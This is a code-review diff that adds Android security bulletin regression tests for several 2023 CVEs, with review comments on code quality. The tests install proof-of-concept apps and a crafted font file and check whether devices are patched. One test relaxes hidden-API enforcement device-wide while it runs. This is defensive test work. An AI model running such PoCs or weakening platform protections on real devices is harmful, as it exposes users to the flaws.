+ private void checkApkSignerScheme(
+ String apkWith10Signers, String apkWith11Signers, String apkSignerScheme) {
+ try {
+ final CommandResult outputV1Only10 = installAndCheck(apkWith10Signers);
+ final CommandResult outputV1Only11 = installAndCheck(apkWith11Signers);
+ if (outputV1Only10.getStatus() != SUCCESS) {
+ // outputV1Only10 should be successful as it is expected that installation of an apk
+ // with 10 signers should be allowed
+ mAssumptionFailureList.add(
+ format("Unable to install app %s with 10 signatures", apkWith10Signers));
+ return;
+ }
+ if (outputV1Only11.getStatus() == SUCCESS) {
+ // Add scheme to mFailureList if installation of an apk with 11 signers is
+ // successful
+ mFailureList.add(
+ format(
+ "%s scheme allows installation of apk %s with more than 10 signers",
+ apkSignerScheme, apkWith11Signers));
+ }
+ } catch (Exception e) {
+ // Add exception occurred in mAssumptionFailureList. This is done to avoid test
+ // termination midway and ensure that both the schemes are checked
+ mAssumptionFailureList.add(
+ format(
+ "Exception %s occurred while checking %s apk signer scheme",
+ e.getMessage(), apkSignerScheme));
+ }
+ }
+
+ private CommandResult installAndCheck(String apkName) throws Exception {
+ final ITestDevice device = getDevice();
+ final String apkPath = AdbUtils.TMP_PATH + apkName;
+ try {
+ // Push apk file to /data/local/tmp
+ AdbUtils.pushResource(AdbUtils.RESOURCE_ROOT + apkName, apkPath, device);
+
+ // Install apk
+ return device.executeShellV2Command("pm install " + apkPath);
+ } finally {
+ // Uninstall apk
+ device.executeShellV2Command("pm uninstall android.appsecurity.cts.tinyapp");
+
+ // Remove apk file from /data/local/tmp
+ AdbUtils.removeResources(new String[] {apkName}, AdbUtils.TMP_PATH, device);
+ }
+ }
+}
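Review bot: The locals `outputV1Only10` and `outputV1Only11` in checkApkSignerScheme are also used when testPocCVE_2023_21253 calls it for the V2 apks, so the names mislead; `resultWith10Signers` and `resultWith11Signers` would match the parameter names. In the catch block `e.getMessage()` can be null and drops the exception type, so passing `e` itself to the `%s` placeholder keeps both in the recorded assumption failure.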
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21254.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21254.java
new file mode 100644
index 0000000..0155a9d
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21254.java
@@ -0,0 +1,47 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeNoException;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_21254 extends NonRootSecurityTestCase {
+
+ @AsbSecurityTest(cveBugId = 254736794)
+ @Test
+ public void testPocCVE_2023_21254() {
+ try {
+ // Install test-app and helper-app
+ installPackage("CVE-2023-21254-test.apk");
+ installPackage("CVE-2023-21254-helper.apk");
+
+ // Run Device test
+ final String testPkg = "android.security.cts.CVE_2023_21254_test";
+ runDeviceTests(testPkg, testPkg + ".DeviceTest", "testPocCVE_2023_21254");
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21256.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21256.java
new file mode 100644
index 0000000..b367055
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21256.java
@@ -0,0 +1,85 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeFalse;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.device.UserInfo;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import com.android.tradefed.testtype.junit4.DeviceTestRunOptions;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.Map;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_21256 extends NonRootSecurityTestCase {
+
+ @AsbSecurityTest(cveBugId = 268193384)
+ @Test
+ public void testPocCVE_2023_21256() {
+ ITestDevice device = null;
+ int workUserId = -1;
+ try {
+ final String testPkg = "android.security.cts.CVE_2023_21256";
+ device = getDevice();
+
+ assumeTrue(device.isMultiUserSupported());
+
+ AdbUtils.runCommandLine(
+ "pm create-user --profileOf 0 --managed CVE_2023_21256_work_user", device);
+
+ Map<Integer, UserInfo> mapOfUserInfos = device.getUserInfos();
+ for (UserInfo userInfo : mapOfUserInfos.values()) {
+ if (userInfo.userName().equals("CVE_2023_21256_work_user")) {
+ workUserId = userInfo.userId();
+ }
+ }
+ assumeFalse(workUserId == -1);
+
+ assumeTrue(device.startUser(workUserId, true /* waitFlag */));
+
+ // Install the test app in work profile
+ installPackage("CVE-2023-21256.apk", "--user " + workUserId);
+
+ runDeviceTests(
+ new DeviceTestRunOptions(testPkg)
+ .setDevice(device)
+ .setTestClassName(testPkg + ".DeviceTest")
+ .setTestMethodName("testSettingsHomePageActivityFromWorkProfile")
+ .setUserId(workUserId));
+ } catch (Exception e) {
+ assumeNoException(e);
+ } finally {
+ if (workUserId != -1) {
+ try {
+ device.stopUser(workUserId, true /* waitFlag */, true /* forceFlag */);
+ device.removeUser(workUserId);
+ } catch (Exception e) {
+ // Ignore exceptions as the test has finished
+ }
+ }
+ }
+ }
+}
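Review bot: `pm create-user --profileOf 0` in testPocCVE_2023_21256 hard-codes user 0 as the profile parent, which may not be the foreground user on devices that run with a headless system user. There the profile creation would presumably fail and the test would end as an assumption failure instead of exercising the check. Other tests in this change read the user with `device.getCurrentUser()`, and the same could be done here: `"pm create-user --profileOf " + device.getCurrentUser() + " --managed CVE_2023_21256_work_user"`. The name lookup that follows has no `break` and would also match a profile left over from an aborted earlier run, so a comment stating that assumption would help.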
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21260.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21260.java
new file mode 100644
index 0000000..175d914
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21260.java
@@ -0,0 +1,62 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_21260 extends NonRootSecurityTestCase {
+
+ // b/259384309
+ // Vulnerable module : CarSettings.apk
+ @AsbSecurityTest(cveBugId = 259384309)
+ @Test
+ public void testPocCVE_2023_21260() {
+ try {
+ final String FEATURE_AUTOMOTIVE = "android.hardware.type.automotive";
+
+ // Skip test for non-automotive builds
+ assumeTrue(
+ "Skipping test: " + FEATURE_AUTOMOTIVE + " missing",
+ hasDeviceFeature(FEATURE_AUTOMOTIVE));
+ final String testPkg = "android.security.cts.CVE_2023_21260";
+
+ // Install the test app
+ installPackage("CVE-2023-21260.apk");
+
+ // Run the test "testCVE_2023_21260"
+ runDeviceTests(testPkg, testPkg + ".DeviceTest", "testCVE_2023_21260");
+ } catch (Exception e) {
+ assumeNoException(e);
+ } finally {
+ try {
+ AdbUtils.runCommandLine("input keyevent KEYCODE_HOME", getDevice());
+ } catch (Exception ignored) {
+ // ignore all exceptions
+ }
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21261.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21261.java
new file mode 100644
index 0000000..d2c57f8
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21261.java
@@ -0,0 +1,72 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static com.android.sts.common.NativePocCrashAsserter.assertNoCrash;
+import static com.android.sts.common.NativePocStatusAsserter.assertNotVulnerableExitCode;
+
+import static org.junit.Assume.assumeNoException;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.NativePoc;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.sts.common.util.TombstoneUtils;
+import com.android.sts.common.util.TombstoneUtils.Config.BacktraceFilterPattern;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+// CVE-2023-21261 includes fix for CVE-2022-27406.
+// Hence checking for both the vulnerabilties
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_21261 extends NonRootSecurityTestCase {
+
+ // b/271680254
+ // Vulnerability Behaviour : SIGSEGV in self
+ // Vulnerable Library : libft2.so (As per AOSP code)
+ // Vulnerable Function : FT_Request_Size (As per AOSP code)
+ // Is Play managed : No
+ @AsbSecurityTest(cveBugId = 271680254)
+ @Test
+ public void testPocCVE_2023_21261() {
+ try {
+ String binaryName = "CVE-2023-21261";
+ String inputFile = "cve_2023_21261.ttf";
+
+ TombstoneUtils.Config crashConfig =
+ new TombstoneUtils.Config()
+ .setProcessPatterns(binaryName)
+ .setBacktraceIncludes(
+ new BacktraceFilterPattern("libft2.so", "FT_Request_Size"))
+ .setSignals(TombstoneUtils.Signals.SIGSEGV)
+ .setIgnoreLowFaultAddress(false);
+
+ // Running the PoC for CVE-2022-27406
+ NativePoc.builder()
+ .pocName(binaryName)
+ .args("CVE-2022-27406", inputFile)
+ .resources(inputFile)
+ .asserter(assertNoCrash(crashConfig))
+ .build()
+ .run(this);
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
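Review bot: The class comment says both CVE-2023-21261 and CVE-2022-27406 are checked, but testPocCVE_2023_21261 builds a single NativePoc run with the argument "CVE-2022-27406". Unless the binary covers both internally, which is not visible here, the comment overstates the coverage. Suggested wording: `// The fix for CVE-2023-21261 includes the fix for CVE-2022-27406, so the PoC for CVE-2022-27406 is run as the check.` The static import of `assertNotVulnerableExitCode` is unused and can be dropped.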
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21272.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21272.java
new file mode 100644
index 0000000..0c4f2a2
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21272.java
@@ -0,0 +1,59 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeNoException;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_21272 extends NonRootSecurityTestCase {
+
+ // b/227471459
+ // Vulnerable module : framework.jar
+ @AsbSecurityTest(cveBugId = 227471459)
+ @Test
+ public void testPocCVE_2023_21272() {
+ try {
+ final String testPkg = "android.security.cts.CVE_2023_21272_test";
+
+ // Install the helper app
+ installPackage("CVE-2023-21272-helper.apk");
+
+ // Install the test app
+ installPackage("CVE-2023-21272-test.apk");
+
+ // Run the test "testCVE_2023_21272"
+ runDeviceTests(testPkg, testPkg + ".DeviceTest", "testCVE_2023_21272");
+ } catch (Exception e) {
+ assumeNoException(e);
+ } finally {
+ try {
+ // return to Home screen after test run
+ AdbUtils.runCommandLine("input keyevent KEYCODE_HOME", getDevice());
+ } catch (Exception ignored) {
+ // ignore all exceptions
+ }
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21279.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21279.java
new file mode 100644
index 0000000..fed42d6
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21279.java
@@ -0,0 +1,89 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.UserUtils;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import com.android.tradefed.util.IRunUtil;
+import com.android.tradefed.util.RunUtil;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_21279 extends NonRootSecurityTestCase {
+
+ @AsbSecurityTest(cveBugId = 277741109)
+ @Test
+ public void testPocCVE_2023_21279() {
+ try {
+ ITestDevice device = getDevice();
+ final String testPkg = "android.security.cts.CVE_2023_21279";
+
+ // Install test app in device
+ installPackage("CVE-2023-21279.apk", "-g");
+
+ // Create new user and save a screenshot in that user
+ final int currentUserId = device.getCurrentUser();
+ try (AutoCloseable asSecondaryUser =
+ new UserUtils.SecondaryUser(device)
+ .name("cve_2023_21279_user")
+ .doSwitch()
+ .withUser()) {
+ int userId = device.getCurrentUser();
+ device.executeShellCommand("input keyevent KEYCODE_SYSRQ");
+
+ // Wait for screenshot to get saved in the created user
+ final long timeout = 5_000L;
+ final long waitPerIteration = 500L;
+ boolean screenshotSaved = false;
+ IRunUtil runUtil = RunUtil.getDefault();
+ long start = System.currentTimeMillis();
+ do {
+ screenshotSaved =
+ device.executeShellCommand(
+ "content query --user "
+ + userId
+ + " --projection _id --uri"
+ + " content://media/external/images/media/")
+ .contains("Row");
+ if (screenshotSaved) {
+ break;
+ }
+ runUtil.sleep(waitPerIteration);
+ } while (System.currentTimeMillis() - start <= timeout);
+ assumeTrue(
+ "Screenshot was not saved in the created userId = " + userId,
+ screenshotSaved);
+ // Switch back to original user
+ assumeTrue(device.switchUser(currentUserId));
+
+ // Run DeviceTest
+ runDeviceTests(testPkg, testPkg + ".DeviceTest", "testPocCVE_2023_21279");
+ }
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21285.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21285.java
new file mode 100644
index 0000000..d4ce9a4
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21285.java
@@ -0,0 +1,52 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeNoException;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.UserUtils;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_21285 extends NonRootSecurityTestCase {
+
+ @AsbSecurityTest(cveBugId = 271851153)
+ @Test
+ public void testPocCVE_2023_21285() {
+ try {
+ final String testPkg = "android.security.cts.CVE_2023_21285";
+ installPackage("CVE-2023-21285.apk");
+
+ try (AutoCloseable asSecondaryUser =
+ new UserUtils.SecondaryUser(getDevice())
+ .name("cve_2023_21285_user")
+ .withUser()) {
+
+ // Run DeviceTest
+ runDeviceTests(testPkg, testPkg + ".DeviceTest", "testPocCVE_2023_21285");
+ }
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21286.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21286.java
new file mode 100644
index 0000000..31494b2
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21286.java
@@ -0,0 +1,89 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.UserUtils;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import com.android.tradefed.util.IRunUtil;
+import com.android.tradefed.util.RunUtil;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_21286 extends NonRootSecurityTestCase {
+
+ @AsbSecurityTest(cveBugId = 277740082)
+ @Test
+ public void testPocCVE_2023_21286() {
+ try {
+ ITestDevice device = getDevice();
+ final String testPkg = "android.security.cts.CVE_2023_21286";
+
+ // Install test app in device
+ installPackage("CVE-2023-21286.apk", "-g");
+
+ // Create new user and save a screenshot in that user
+ final int currentUserId = device.getCurrentUser();
+ try (AutoCloseable asSecondaryUser =
+ new UserUtils.SecondaryUser(device)
+ .name("cve_2023_21286_user")
+ .doSwitch()
+ .withUser()) {
+ int userId = device.getCurrentUser();
+ device.executeShellCommand("input keyevent KEYCODE_SYSRQ");
+
+ // Wait for screenshot to get saved in the created user
+ final long timeout = 5_000L;
+ final long waitPerIteration = 500L;
+ boolean screenshotSaved = false;
+ IRunUtil runUtil = RunUtil.getDefault();
+ long start = System.currentTimeMillis();
+ do {
+ screenshotSaved =
+ device.executeShellCommand(
+ "content query --user "
+ + userId
+ + " --projection _id --uri"
+ + " content://media/external/images/media/")
+ .contains("Row");
+ if (screenshotSaved) {
+ break;
+ }
+ runUtil.sleep(waitPerIteration);
+ } while (System.currentTimeMillis() - start <= timeout);
+ assumeTrue(
+ "Screenshot was not saved in the created userId = " + userId,
+ screenshotSaved);
+ // Switch back to original user
+ assumeTrue(device.switchUser(currentUserId));
+
+ // Run DeviceTest
+ runDeviceTests(testPkg, testPkg + ".DeviceTest", "testPocCVE_2023_21286");
+ }
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
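Review bot: The screenshot-wait loop in `testPocCVE_2023_21286` (the `do { … } while` around `content query --user`) is a line-for-line copy of the one added in CVE_2023_21279.java in this same change, so any later fix to the timeout or the match has to be made twice. A shared helper in a common test utility, for example `waitForScreenshot(device, userId)`, would keep the two in step. The `.contains("Row")` match accepts any image row in that user's media store, which is a reliable signal only because the user was just created; a one-line comment saying so would help. If the screenshot never appears the test ends in `assumeTrue` and is reported as skipped, which says nothing about whether the device is patched.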
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21291.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21291.java
new file mode 100644
index 0000000..d197a92
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21291.java
@@ -0,0 +1,60 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeNoException;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.SystemUtil;
+import com.android.sts.common.UserUtils;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_21291 extends NonRootSecurityTestCase {
+
+ @AsbSecurityTest(cveBugId = 277593270)
+ @Test
+ public void testPocCVE_2023_21291() {
+ try {
+ // Install application
+ installPackage("CVE-2023-21291.apk", "-g");
+
+ // Create a secondary user cve_2023_21291_user and enable global hidden_api_policy to
+ // access hidden field in DeviceTest
+ ITestDevice device = getDevice();
+ try (AutoCloseable closable =
+ SystemUtil.withSetting(device, "global", "hidden_api_policy", "1");
+ AutoCloseable asSecondaryUser =
+ new UserUtils.SecondaryUser(device)
+ .name("cve_2023_21291_user")
+ .withUser()) {
+
+ // Run DeviceTest
+ final String testPkg = "android.security.cts.CVE_2023_21291";
+ runDeviceTests(testPkg, testPkg + ".DeviceTest", "testPocCVE_2023_21291");
+ }
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
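Review bot: The comment above the try-with-resources says the test will "enable global hidden_api_policy", but the code sets it to `"1"`, which as far as I know relaxes hidden-API enforcement to warn-only rather than switching a feature on. Since this weakens a platform protection device-wide while the test runs, the comment should state the effect and the restore, e.g. `// Relax hidden-API enforcement (hidden_api_policy=1) so DeviceTest can read the hidden field; withSetting restores the old value on close.` Whether `withSetting` restores the previous value is presumed from its `AutoCloseable` return and should be confirmed. Renaming the resource `closable` to `withHiddenApiPolicy` would match `asSecondaryUser`.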
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_35669.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_35669.java
new file mode 100644
index 0000000..06dffc4
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_35669.java
@@ -0,0 +1,48 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeNoException;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_35669 extends NonRootSecurityTestCase {
+
+ @AsbSecurityTest(cveBugId = 265798288)
+ @Test
+ public void testPocCVE_2023_35669() {
+ try {
+ // Install the test and target apps
+ installPackage("CVE-2023-35669-test.apk");
+ installPackage("CVE-2023-35669-target.apk");
+
+ final String testPkg = "android.security.cts.CVE_2023_35669_test";
+
+ // Run the test "testCVE_2023_35669"
+ runDeviceTests(testPkg, testPkg + ".DeviceTest", "testCVE_2023_35669");
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_40120.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_40120.java
new file mode 100644
index 0000000..a489cea
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_40120.java
@@ -0,0 +1,52 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeNoException;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_40120 extends NonRootSecurityTestCase {
+
+ @AsbSecurityTest(cveBugId = 274775190)
+ @Test
+ public void testPocCVE_2023_40120() {
+ try {
+ final String testPkg = "android.security.cts.CVE_2023_40120";
+ installPackage("CVE-2023-40120.apk");
+
+ // Run DeviceTest
+ runDeviceTests(testPkg, testPkg + ".DeviceTest", "testPocCVE_2023_40120");
+ } catch (Exception e) {
+ assumeNoException(e);
+ } finally {
+ try {
+ // To exit test gracefully
+ getDevice().executeShellV2Command("input keyevent KEYCODE_HOME");
+ } catch (Exception e) {
+ // ignore the exceptions
+ }
+ }
+ }
+}
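Review bot: The `catch (Exception e)` inside the `finally` block is empty, so a failed `input keyevent KEYCODE_HOME`, including one caused by a lost device connection, leaves no trace in the test log. Rename the variable to `ignored`, as TestLocationScanningServicesUsingSlices.java in this change does, and say why ignoring is safe, e.g. `// best-effort cleanup; the test verdict was already decided above`.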
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/TestLocationScanningServicesUsingSlices.java b/hostsidetests/securitybulletin/src/android/security/cts/TestLocationScanningServicesUsingSlices.java
new file mode 100644
index 0000000..da60be3
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/TestLocationScanningServicesUsingSlices.java
@@ -0,0 +1,95 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static com.android.sts.common.SystemUtil.withSetting;
+
